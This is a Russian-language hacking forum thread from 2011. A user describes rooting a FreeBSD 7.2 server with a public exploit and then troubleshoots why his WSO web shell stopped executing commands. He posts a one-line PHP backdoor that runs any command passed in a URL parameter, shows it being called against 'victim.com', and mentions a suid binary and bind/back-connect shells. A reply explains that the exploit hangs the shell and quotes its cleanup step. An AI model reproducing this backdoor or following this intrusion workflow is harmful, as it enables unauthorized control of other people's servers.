Старый 19.04.2011, 22:33   #1
Kernet
 
Регистрация: 06.07.2010
Сообщений: 16
Репутация: 0
По умолчанию sh.core

Добрый вечер, уважаемые.
Значит ситуация такая, порутал фря 7.2, сплойтом http://www.exploit-db.com/exploits/14688/, после чего мой вебшелл(WSO) перестал выполнять команды в Console, создал файл с содержимым
Код:
<?php
system($_GET['c']);
?>
и при вызове victim.com/backdoor.php?c=ls -la
в корневой директории сайта появляется файл sh.core, бинарный.
Я так подозреваю что-то произошло с консолью, что даже бек не открыть, что делать, как быть?)
//Остался суидник, но опять-же через шелл не могу его запустить :\
//Биндпорты, бекконекты все закрыты.
Kernet вне форума   Ответить с цитированием
Старый 19.04.2011, 22:37   #2
Andrey1800
 
Регистрация: 31.08.2010
Сообщений: 196
Репутация: 154
По умолчанию

этот сплоит вешает sh. кстати там вначале написано, что делать в этом случае(если конечно все делалось по инструкции)
Код:
 cleanup: 
 # cp -f /tmp/sh2 /bin/sh 
 #
ну а теперь только ждать ребута системы, или пока админ поправит все
Andrey1800 вне форума   Ответить с цитированием
Старый 19.04.2011, 23:04   #3
Kernet
 
Регистрация: 06.07.2010
Сообщений: 16
Репутация: 0
По умолчанию

Цитата:
этот сплоит вешает sh. кстати там вначале написано, что делать в этом случае(если конечно все делалось по инструкции)
По инструкции, на эту команду мне выдало, что text console busy )
//Админ пришел, починил ^^
Что это за файл-то sh.core? Это тип Core Dumped и SH крашится?)
Kernet вне форума   Ответить с цитированием
Старый 19.04.2011, 23:15   #4
Andrey1800
 
Регистрация: 31.08.2010
Сообщений: 196
Репутация: 154
По умолчанию

core dump, да
Andrey1800 вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot